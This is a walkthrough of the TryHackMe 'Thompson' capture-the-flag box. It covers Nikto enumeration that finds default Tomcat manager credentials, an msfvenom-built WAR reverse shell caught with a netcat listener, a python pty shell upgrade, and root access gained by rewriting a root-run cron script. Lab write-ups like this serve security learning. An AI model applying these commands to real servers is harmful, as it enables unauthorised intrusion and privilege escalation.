TryHackMe Walkthrough - Thompson
Do NOT try this on a real cat!!!!!
13/01/2021
Another day, another badly configured tomcat server. What's new? Lets take a look at this box together and see how we can really make the most of this vulnerable machine! Check the room out here!
Enumeration
As always, our first step is enumeration. I ran both an NMAP scan and a Nikto scan, but the later was where the goodies were!
nikto -h http://10.10.76.64
\+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
\+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
\+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
\+ /manager/status: Tomcat Server Status interface found (pass protected)
So we've found an admin panel and it seems to be using default credentials. By visiting "/manager/html" we are prompted for some credentials! We can put in the ones we just found and we're in!
The deploy section is very interesting - maybe we can upload a reverse shell?
Reverse Shell Time!
We can create a ".war" reverse shell using good ol' msfvenom. I used this command to generate one of my very own:
msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=IP LPORT=1234 -f war > shell.war
Replace IP with your own IP (the one on the top corner of the TryHackMe website) and you've got your own custom shell! We can then set up a netcat listener:
nc -lvp 1234
Next, we upload our shell to the site using the deploy section and visit /shell to run it. We should now have a connection via netcat!
Upgrading that shell!
The shell we have right now is pretty... ugly. We can make it a bit more usable by using python to upgrade it. Run this command on the server:
python -c 'import pty; pty.spawn("/bin/bash")'
Just like that, 100x more usable!
User Flag
Time to explore! If we check out the home directory we'll find the user "jack". Jack has a lovely file for us called "user.txt" in which we can find the first flag!
Root Flag
Time for the root flag! There was two other interesting files in Jack's home folder: "id.sh" and "test.txt". The first was a script that outputted the "id" command in the "test.txt" file. Neat - but how can we abuse this?
I had a feeling this might be related to a cronjob so I check /etc/crontab. Sure enough, this file was run as root every minute!
\# m h dom mon dow user command
17 \* \* \* \* root cd / && run-parts --report /etc/cron.hourly
25 6 \* \* \* root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 \* \* 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 \* \* root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
\* \* \* \* \* root cd /home/jack && bash id.sh
This basically means, whatever code is in the "id.sh" file will be run as root. I had some trouble using tiny vim with my shell so I had to echo any commands I wanted to run into the file. I started with:
echo "ls /root > ls.txt" > id.sh
After the file was run, I could see the contents of the root directory. All that it contained was a lonely "root.txt" file. Let's take a look at this file! I modified "id.sh" to cat the contents of it into a file we could read.
echo "cat /root/root.txt > root.txt" > id.sh
Once this code ran I could open out new "root.txt" file and get the flag!
Conclusion
This was a simple and fun room! I didn't know tomcat had so much of a backend!